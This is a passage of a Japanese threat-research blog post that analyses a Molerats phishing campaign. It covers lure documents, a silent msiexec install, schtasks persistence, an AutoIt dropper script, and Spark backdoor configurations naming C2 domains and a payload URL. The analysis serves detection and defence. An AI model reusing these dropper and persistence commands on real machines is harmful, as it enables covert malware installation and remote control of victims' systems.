href=\"https:\/\/attack.mitre.org\/techniques\/T1218\/\">T1218<\/a>)\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u305fPlayerVLC.msi\u30d5\u30a1\u30a4\u30eb\u3092\u8d77\u52d5\u3057\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">%comspec% \/c taskkill \/F \/IM msiexec.exe &amp; ping 127.0.0.1 -n 2 &gt;NUL &amp; msiexec \/i C:\\ProgramData\\PlayerVLC.msi \/quiet \/qn \/norestart<\/span><\/p>\n<p>\u6b8b\u5ff5\u306a\u3053\u3068\u306b\u3001PlayerVLC.msi\u30d5\u30a1\u30a4\u30eb\u306fC2\u30b5\u30fc\u30d0\u30fc\u306b\u3088\u3063\u3066\u30db\u30b9\u30c8\u3055\u308c\u306a\u304f\u306a\u3063\u3066\u3044\u308b\u305f\u3081\u3001\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u53d6\u5f97\u3059\u308b\u3053\u3068\u306f\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u611f\u67d3\u3092\u6210\u529f\u3055\u305b\u308b\u305f\u3081\u306bC2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u6709\u52b9\u306a\u901a\u4fe1\u30c1\u30a7\u30fc\u30f3\u304c\u5fc5\u8981\u3068\u306a\u308b\u30e2\u30b8\u30e5\u30fc\u30eb \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5229\u70b9\u3092\u5f37\u8abf\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001\u4fb5\u5165\u5f8c\u306e\u5206\u6790\u304c\u56f0\u96e3\u306b\u306a\u308b\u304b\u3089\u3067\u3059\u3002\u3053\u306e\u30bf\u30a4\u30d7\u306e\u30e2\u30b8\u30e5\u30fc\u30eb \u30da\u30a4\u30ed\u30fc\u30c9\u304a\u3088\u3073C2\u30ea\u30af\u30a8\u30b9\u30c8\u306e\u30c1\u30a7\u30fc\u30f3\u306f\u304d\u308f\u3081\u3066\u4e00\u822c\u7684\u3067\u3001DarkHydrus\u3084Sofacy\u306a\u3069\u306e\u3055\u307e\u3056\u307e\u306a\u653b\u6483\u8005\u306b\u3088\u308b\u4f7f\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u52d5\u4f5c\u3067\u306f\u3001\u653b\u6483\u6642\u306b\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u5c55\u958b\u3057\u3001\u4eca\u5f8c\u306e\u5206\u6790\u306b\u4f7f\u7528\u3067\u304d\u308b\u8ffd\u52a0\u306e\u30a2\u30fc\u30c6\u30a3\u30d5\u30a1\u30af\u30c8\u3092\u56de\u907f\u3067\u304d\u308b\u305f\u3081\u3001\u653b\u6483\u8005\u304c\u81ea\u52d5\u5316\u3055\u308c\u305f\u9632\u5fa1\u7b56\u3092\u56de\u907f\u3059\u308b\u306e\u306b\u5f79\u7acb\u3061\u307e\u3059\u3002<\/p>\n<h2><a id=\"post-105222-attachment-delivery-document\"><\/a>\u6dfb\u4ed8\u306b\u3088\u308b\u914d\u4fe1\u6587\u66f8<\/h2>\n<p>2019\u5e7410\u670831\u65e5\u306811\u67082\u65e5\u306b\u914d\u4fe1\u3055\u308c\u305fWord\u6587\u66f8(SHA256: eaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000)\u306b\u306fattachment.doc\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u540d\u304c\u4ed8\u3044\u3066\u304a\u308a\u3001\u57cb\u3081\u8fbc\u307f\u30de\u30af\u30ed\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u306e\"\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u6709\u52b9\u5316\"\u30dc\u30bf\u30f3\u3092\u53d7\u4fe1\u8005\u304c\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u8a98\u5c0e\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u56f32\u306f\u3001\u53d7\u4fe1\u8005\u304c\"\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u6709\u52b9\u5316\"\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u8a98\u5c0e\u3059\u308b\u3068\u304d\u306b\u4f7f\u7528\u3055\u308c\u308b\u30eb\u30a2\u30fc\u753b\u50cf\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u6587\u66f8\u306f\u3001\u524d\u8ff0\u3057\u305fMOFA\u3068\u5165\u3063\u305f\u914d\u4fe1\u6587\u66f8\u3068\u306f\u7570\u306a\u308a\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3067\u3057\u305f\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"1666\" height=\"720\"  class=\"wp-image-105227 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-2-lure-image-in-attachment-delivery-docume.png\" alt=\"Figure 2. Lure image in Attachment delivery document\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f32. \u6dfb\u4ed8\u306b\u3088\u308b\u914d\u4fe1\u6587\u66f8\u5185\u306e\u30eb\u30a2\u30fc\u753b\u50cf<\/span><\/p>\n<p>\u3053\u306e\u30de\u30af\u30ed\u306f\u975e\u5e38\u306b\u5358\u7d14\u3067\u3059\u3002\u6b21\u306eGoogle\u30c9\u30e9\u30a4\u30d6\u306eURL\u304b\u3089base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001\u30c7\u30b3\u30fc\u30c9\u3057\u3066%TEMP%\\rundll64.exe\u306b\u4fdd\u5b58\u3057\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/drive.google[.]com\/uc?export=download&amp;id=1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH<\/span><\/p>\n<p>\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305f\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb(SHA256: 7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128P)\u306f\u3001%userprofile%\\runawy.exe\u306b\u57cb\u3081\u8fbc\u307f\u306e\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u5b9f\u884c\u3059\u308b\u3001\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3059\u3002AutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001\u7d42\u4e86\u3059\u308b\u524d\u306b\u3001\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u30b9\u30bf\u30fc\u30c8\u30a2\u30c3\u30d7 \u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306b\u30b3\u30d4\u30fc\u3057\u3001\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3092\u4f5c\u6210\u3059\u308b\u3053\u3068\u3067\u3001\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u304c\u5b9f\u884c\u3057\u7d9a\u3051\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">SCHTASKS \/Create \/f \/SC minute \/TN \"runawy\" \/mo 5 \/tr \"%userprofile%\\runawy.exe\"<\/span><\/p>\n<p>runawy.exe\u30d5\u30a1\u30a4\u30eb(SHA256:64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431)\u306f\u3001\"S4.4P\"\u306e\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u3092\u4f5c\u6210\u3059\u308bEnigma\u3067\u30d1\u30c3\u30af\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3059\u3002\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306fSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u30d1\u30c3\u30af\u3055\u308c\u305f\u4e9c\u7a2e\u3067\u3001Molerats\u306b\u6392\u4ed6\u7684\u306b\u30ea\u30f3\u30af\u3055\u308c\u3066\u3044\u307e\u3059\u3002Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u8a73\u7d30\u306a\u6a5f\u80fd\u306b\u3064\u3044\u3066\u306f\u3001\u3053\u306e\u30d6\u30ed\u30b0\u306e\u5f8c\u534a\u3067\u8aac\u660e\u3057\u307e\u3059\u304c\u3001\u7279\u5b9a\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u69cb\u6210\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"sIt\":\"nysura[.]com\",\"QrU\":\"\/\",\"JJDF\":80,\"MJOu\":0,\"TuS\":\"\",\"pJhC\":1,\"Lm\":\"NMRm3AlaGUeT2g9iA2lNTIk04vSj8r2IBUDEvItgOxw=\",\"LPO\":10000}<\/span><\/p>\n<h2><a id=\"post-105222-pictures-pdf-delivery-document\"><\/a>Pictures.PDF\u306b\u3088\u308b\u914d\u4fe1\u6587\u66f8<\/h2>\n<p>\u524d\u8ff0\u306e2\u3064\u306eWord\u6587\u66f8\u3068\u306f\u5225\u306b\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u306b \u0635\u0648\u0631\u0643 &lt;\u7de8\u96c6\u6e08\u307f&gt;\u0645\u0639 \u0647\u0628\u0629 (\u30a2\u30e9\u30d3\u30a2\u8a9e\u3067\u3001\u5927\u307e\u304b\u306a\u610f\u5473\u306f\"Heba\u3068\u306e\u6065\u305a\u304b\u3057\u3044\u5199\u771f\")\u3068\u3044\u3046\u4ef6\u540d\u3067\u6dfb\u4ed8\u3055\u308c\u305f\"Pictures.pdf\" (SHA256:9d6ce7c585609b8b23703617ef9d480c1cfe0f3bf6f57e178773823b8bf86495)\u3068\u3044\u3046\u540d\u524d\u306ePDF\u6587\u66f8\u3092\u89b3\u5bdf\u3057\u307e\u3057\u305f\u3002\u3053\u306ePDF\u6587\u66f8\u306f\u8106\u5f31\u6027\u3092\u7a81\u304f\u3082\u306e\u3067\u306f\u306a\u304f\u3001\u653b\u6483\u8005\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u305f\u3081\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u53d7\u4fe1\u8005\u3092\u8105\u3059\u30e1\u30c3\u30bb\u30fc\u30b8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3001\u3053\u306ePDF\u6587\u66f8\u306f\u3001\u5de7\u5999\u306a\u30eb\u30a2\u30fc\u753b\u50cf\u3068\u6b20\u843d\u3057\u305f\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u4f7f\u7528\u3057\u3066\u30de\u30af\u30ed\u3092\u6709\u52b9\u5316\u3059\u308b\u3088\u3046\u30e6\u30fc\u30b6\u30fc\u3092\u8a98\u5c0e\u3059\u308bWord\u306e\u914d\u4fe1\u6587\u66f8\u3068\u306f\u7570\u306a\u308a\u3001\u8105\u8feb\u3068\u3082\u8a00\u3048\u308b\u30e1\u30c3\u30bb\u30fc\u30b8\u304c\u542b\u307e\u308c\u305f\u3088\u308a\u539a\u304b\u307e\u3057\u3044\u30a2\u30d7\u30ed\u30fc\u30c1\u3092\u4f7f\u7528\u3057\u3066\u30e6\u30fc\u30b6\u30fc\u306b\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3055\u305b\u3001RAR\u30a2\u30fc\u30ab\u30a4\u30d6\u3092\u958b\u3044\u3066\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u5b9f\u884c\u3055\u305b\u3088\u3046\u3068\u3057\u307e\u3059\u3002<\/p>\n<p>PDF\u6587\u66f8\u5185\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u30a2\u30e9\u30d3\u30a2\u8a9e\u3067\u66f8\u304b\u308c\u3066\u304a\u308a\u3001\u9001\u4fe1\u8005\u304c\u53d7\u4fe1\u8005\u306e\u6065\u305a\u304b\u3057\u3044\u5199\u771f\u3092\u6240\u6301\u3057\u3066\u3044\u3066\u3001\u305d\u308c\u3092\u30de\u30b9\u30b3\u30df\u306b\u516c\u958b\u3059\u308b\u3068\u307b\u306e\u3081\u304b\u3057\u3066\u3044\u307e\u3059\u3002\u30e1\u30c3\u30bb\u30fc\u30b8\u306b\u306f\u3001\u3053\u306e\u6587\u66f8\u304c\u653f\u5e9c\u95a2\u4fc2\u306e\u540c\u50da\u306b\u3082\u9001\u4fe1\u3055\u308c\u305f\u3053\u3068\u304c\u793a\u3055\u308c\u3001\u88ab\u5bb3\u8005\u306b\u6587\u66f8\u5185\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3088\u3046\u8105\u3057\u3066\u3044\u307e\u3059\u3002\u56f33\u306f\u3001PDF\u6587\u66f8\u5185\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"1879\" height=\"1234\"  class=\"wp-image-105229 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-3-screenshot-of-the-contents-of-the-malici.png\" alt=\"Figure 3. Screenshot of the contents of the malicious PDF document\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f33. \u60aa\u610f\u306e\u3042\u308bPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8<\/span><\/p>\n<p>\u6587\u66f8\u5185\u306e\u30ea\u30f3\u30af\u306f\u30a2\u30e9\u30d3\u30a2\u8a9e\u3067\u66f8\u304b\u308c\u3066\u304a\u308a\u3001\u5927\u307e\u304b\u306a\u8a33\u306f\"Heba\u3068\u306e\u6065\u305a\u304b\u3057\u3044\u5199\u771f\u306e\u4e00\u4f8b\"\u304a\u3088\u3073\"\u5199\u771f\"\u3067\u3059\u3002\u3053\u306e\u30ea\u30f3\u30af\u306f\u3001\u6b21\u306eURL(\u5927\u6587\u5b57\/\u5c0f\u6587\u5b57\u3092\u533a\u5225)\u3092\u6307\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/zmartco[.]com\/Pictures.rar<\/span><\/p>\n<p>\"Pictures.rar\"\u30d5\u30a1\u30a4\u30eb(SHA256: 1742caf26d41641925d109caa5b4ebe30cda274077fbc68762109155d3e0b0da)\u306fRAR\u30a2\u30fc\u30ab\u30a4\u30d6\u3067\u3001\u3053\u308c\u306b\u306f\u0647\u0630\u0647 \u0639\u064a\u0646\u0629 \u0642\u0644\u064a\u0644\u0629 \u0645\u0646 \u0627\u0644\u0635\u0648\u0631.exe (SHA256: 92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7)\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u30d5\u30a1\u30a4\u30eb\u304c1\u3064\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u5927\u307e\u304b\u306b\u8a33\u3059\u3068\u3001\"\u3053\u308c\u306f\u5199\u771f\u306e\u4e00\u90e8\u3067\u3059.exe\"\u3068\u306a\u308a\u307e\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306f\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3001\u57cb\u3081\u8fbc\u307f\u306e\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u5c55\u958b\u3057\u3066\u30c7\u30a3\u30b9\u30af\u306eC:\\Users\\Public\\pdf.exe (SHA256: 5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3)\u306b\u4fdd\u5b58\u3057\u3001\u30b9\u30bf\u30fc\u30c8 \u30e1\u30cb\u30e5\u30fc\\\u30d7\u30ed\u30b0\u30e9\u30e0\\\u30b9\u30bf\u30fc\u30c8\u30a2\u30c3\u30d7\\pdf.lnk \u306b\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8\u3092\u4f5c\u6210\u3057\u3066\u3001\u6b21\u306e\u3088\u3046\u306b\u30b7\u30b9\u30c6\u30e0\u304c\u8d77\u52d5\u3059\u308b\u305f\u3073\u306b\u81ea\u52d5\u3067\u5b9f\u884c\u3055\u308c\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002<\/p>\n<pre>#NoTrayIcon\r\nFileInstall(\"pdf.exe\", \"C:\\Users\\Public\\\" &amp; \"\/pdf.exe\")\r\n$cmd1 = \"C:\\Users\\Public\\\" &amp; \"\\pdf.exe\"\r\nRunWait(@ComSpec &amp; \" \/c start \" &amp; $cmd1, \"\", @SW_HIDE)\r\nFileCreateShortcut(\"C:\\Users\\Public\\\" &amp; \"\\pdf.exe\", @StartupDir &amp; \r\n\"\\pdf.lnk\")\r\n<\/pre>\n<p>attachment.doc\u3068\u3044\u3046Word\u6587\u66f8\u306b\u3088\u3063\u3066\u914d\u4fe1\u3055\u308c\u305f\"runawy.exe\"\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u540c\u69d8\u306b\u3001\u30b7\u30b9\u30c6\u30e0\u306b\u4fdd\u5b58\u3055\u308c\u305f\"pdf.exe\"\u30d5\u30a1\u30a4\u30eb\u306f\u3001Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u30d1\u30c3\u30af\u3055\u308c\u305f\u4e9c\u7a2e\u3067\u3059\u3002\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u4e9c\u7a2e\u306e\u69cb\u6210\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"xBql\":\"laceibagrafica[.]com\",\"eauy\":\"\/\",\"Qnd\":80,\"jJN\":0,\"rlOa\":\"\",\"Eb\":1,\"BGa\":\"vcJbq6nzgJk=\",\"qJk\":10000}<\/span><\/p>\n<h2><a id=\"post-105222-delivery-infrastructure\"><\/a>\u914d\u4fe1\u306e\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3<\/h2>\n<p>\u3053\u306e\u3088\u3046\u306a\u653b\u6483\u3092\u8abf\u67fb\u3059\u308b\u969b\u3001\u518d\u5229\u7528\u3055\u308c\u3066\u3044\u308bIP\u30a2\u30c9\u30ec\u30b9\u3084\u30c9\u30e1\u30a4\u30f3\u3092\u8ffd\u8de1\u3057\u305f\u308a\u3001\u985e\u4f3c\u306e\u5c5e\u6027\u3092\u5171\u6709\u3057\u3066\u3044\u308b\u95a2\u9023\u30c9\u30e1\u30a4\u30f3\u3092\u63a2\u3059\u306a\u3069\u306b\u3088\u308a\u3001\u500b\u5225\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u9593\u306e\u30ea\u30f3\u30af\u3092\u5bb9\u6613\u306b\u898b\u3064\u3051\u3089\u308c\u308b\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002\u88681\u306b\u793a\u3059MOFA\u95a2\u9023\u306e\u3059\u3079\u3066\u306e\u914d\u4fe1\u6587\u66f8\u3067\u306f\u3001\u4f7f\u7528\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u306fservicebios[.]com\u3060\u3051\u3067\u3001\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u60c5\u5831\u306e\u307b\u3068\u3093\u3069\u304c\u904e\u53bb\u306b\u4f7f\u7528\u3055\u308c\u305f\u3082\u306e\u306b\u95a2\u9023\u3057\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p>\u8ffd\u52a0\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u95a2\u9023\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u78ba\u8a8d\u304a\u3088\u3073\u767a\u898b\u3059\u308b\u3053\u3068\u3092\u76ee\u7684\u3068\u3057\u305f\u524d\u8ff0\u306e\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u306e\u5206\u6790\u3067\u306f\u3001AutoFocus Threat Intelligence\u30b5\u30fc\u30d3\u30b9\u3067\u3001\u30af\u30e9\u30a6\u30c9 \u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u306eWildFire\u3067\u63d0\u4f9b\u3055\u308c\u305f\u4ee3\u66ff\u306e\u30c7\u30fc\u30bf \u30dd\u30a4\u30f3\u30c8\u3092\u4f7f\u7528\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001\u5f0a\u793e\u304c\u4f7f\u7528\u3057\u305f\u65b9\u6cd5\u3068\u8ffd\u52a0\u306e\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<p>\u4ee5\u4e0b\u306e\u56f34\u306f\u3001\u56f3\u306e\u4e0b\u534a\u5206\u306b\u3042\u308bservicebios[.]com\u30c9\u30e1\u30a4\u30f3\u306b\u95a2\u9023\u3059\u308bWord\u6587\u66f8\u3068Visual Basic Script (vbs)\u30d5\u30a1\u30a4\u30eb\u3092\u8868\u3057\u305fMaltego\u56f3\u3067\u3059\u3002\u95a2\u9023\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u306e\u4e00\u90e8\u306f\u30012\u3064\u306e\u30ea\u30f3\u30af\u306e\u3046\u3061\u306e1\u3064\u3092\u4ecb\u3057\u3066\u3001\u56f3\u306e\u4e0a\u534a\u5206\u306e\u5225\u306e\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u306b\u63a5\u7d9a\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30ea\u30f3\u30af\u306b\u306f\u3001\u9752\u3044\u30dc\u30c3\u30af\u30b9\u306eYara\u30b7\u30b0\u30cd\u30c1\u30e3\u3068\u3001AutoFocus\u3092\u610f\u5473\u3059\u308b\"AF\"\u3067\u793a\u3055\u308c\u305f\u30aa\u30ec\u30f3\u30b8\u8272\u306e\u30dc\u30c3\u30af\u30b9\u5185\u306eAutoFocus\u30af\u30a8\u30ea\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"1865\" height=\"2500\"  class=\"wp-image-105231 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-4-chart-showing-relationships-between-deli.png\" alt=\"Figure 4. Chart showing relationships between delivery documents and associated infrastructure\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f34. \u914d\u4fe1\u6587\u66f8\u3068\u95a2\u9023\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u95a2\u4fc2\u3092\u793a\u3059\u56f3<\/span><\/p>\n<p>AutoFocus\u30af\u30a8\u30ea\u306f\u3001Windows Scripting Host\u30d7\u30ed\u30bb\u30b9(wscript.exe)\u3067\u60aa\u610f\u306e\u3042\u308bVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc \u30b9\u30af\u30ea\u30d7\u30c8\u3092\u8d77\u52d5\u3055\u305b\u308b\u7279\u5b9a\u306e\u30d7\u30ed\u30bb\u30b9\u5b9f\u884c\u30c1\u30a7\u30fc\u30f3\u306b\u95a2\u9023\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001\"MOFA- 101019.doc\" (SHA256: ddf938508618ff7f147b3f7c2b706968cace33819e422fe1daae78bc256f75a8)\u6587\u66f8\u304b\u3089\u3001\u3053\u308c\u307e\u3067\u898b\u904e\u3054\u3055\u308c\u3066\u304d\u305f\u6587\u66f8\"\u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u064a\u0648\u0645\u064a \u062d\u0648\u0644 \u0623\u0647\u0645 \u0627\u0644\u0645\u0633\u062a\u062c\u062f\u0627\u062a \u0627\u0644\u0641\u0644\u0633\u0637\u064a\u0646\u064a\u0629 \u0644\u064a\u0648\u0645 \u2013 9 \u2013 9 \u2013 2019.doc\" (\u6700\u3082\u91cd\u8981\u306a\u30d1\u30ec\u30b9\u30c1\u30ca\u306e\u958b\u767a\u306b\u95a2\u3059\u308b\u65e5\u6b21\u30ec\u30dd\u30fc\u30c8\u30019-9-2019.doc\u3001SHA256: feec28c7c19a8d0ebdca8fcfc0415ae79ef08362bd72304a99eeea55c8871e21)\u304a\u3088\u3073\"\u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u064a\u0648\u0645\u064a \u062d\u0648\u0644 \u0623\u062e\u0631 \u0645\u0633\u062a\u062c\u062f\u0627\u062a \u0627\u0644\u0625\u0631\u0647\u0627\u0628 \u0627\u0644\u0639\u0627\u0644\u0645\u064a- 9 \u2013 9 \u2013 2019.doc\" (\u6700\u65b0\u306e\u30c6\u30ed\u30ec\u30dd\u30fc\u30c8\u306b\u95a2\u3059\u308b\u65e5\u6b21\u66f4\u65b0Alaalmi- 9 \u2013 9 \u2013 2019.doc\u3001SHA256: bf126c2c8f7d4263c78f4b97857912a3c1e87c73fee3f18095d58ef5053f2959)\u306e\u6319\u52d5\u306e\u30a2\u30fc\u30c6\u30a3\u30d5\u30a1\u30af\u30c8\u3092\u78ba\u8a8d\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>\u5143\u306eWord\u6587\u66f8\u3068\u540c\u69d8\u306b\u3001\u65b0\u898f\u6587\u66f8\u5185\u306eVBA\u30de\u30af\u30ed \u30b3\u30fc\u30c9\u3067\u3082\u3001<a href=\"https:\/\/www.motobit.com\/tips\/detpg_Base64\/\">Motobit<\/a>\u304b\u3089\u306e\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u306e\"Base64\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305fVBS\u95a2\u6570\"\u3092\u4f7f\u7528\u3057\u3066\u3001\u5b9f\u884c\u524d\u306b\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u95a2\u6570\u304a\u3088\u3073VBS\u3078\u306eURL\u3092\u30c7\u30b3\u30fc\u30c9(<a href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/\">T1027<\/a>)\u3057\u3066\u3044\u307e\u3057\u305f\u3002VBS\u30d5\u30a1\u30a4\u30eb\u9593\u3067\u306e\u4e3b\u306a\u9055\u3044\u306f\u3001\u30c9\u30e1\u30a4\u30f3(dapoerwedding[.]com)\u3067\u306f\u30012\u756a\u76ee\u306eVBS\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u305f\u3053\u3068\u3067\u3059\u3002\u3053\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u306e\u6642\u70b9\u3067\u306f\u3001\u30c9\u30e1\u30a4\u30f3\u306f45.15.168[.]118\u306b\u89e3\u6c7a\u3055\u308c\u30012019\u5e749\u6708\u304b\u3089\u306e\u4ee5\u524d\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u307e\u3057\u305f\u3002<\/p>\n<p>\u6319\u52d5\u306e\u5171\u901a\u70b9\u3092\u4f7f\u7528\u3057\u305f\u95a2\u9023\u30d5\u30a1\u30a4\u30eb\u306e\u691c\u7d22\u3068\u4e26\u884c\u3057\u3066\u3001\u5f0a\u793e\u3067\u306f\u5143\u306e\u914d\u4fe1\u6587\u66f8\u306b\u95a2\u9023\u3057\u305fVBS\u30b3\u30fc\u30c9\u7528\u306eYara\u30b7\u30b0\u30cd\u30c1\u30e3\u3092\u4f5c\u6210\u3057\u3001\u5f0a\u793e\u304a\u3088\u3073VirusTotal\u306e\u30b3\u30fc\u30d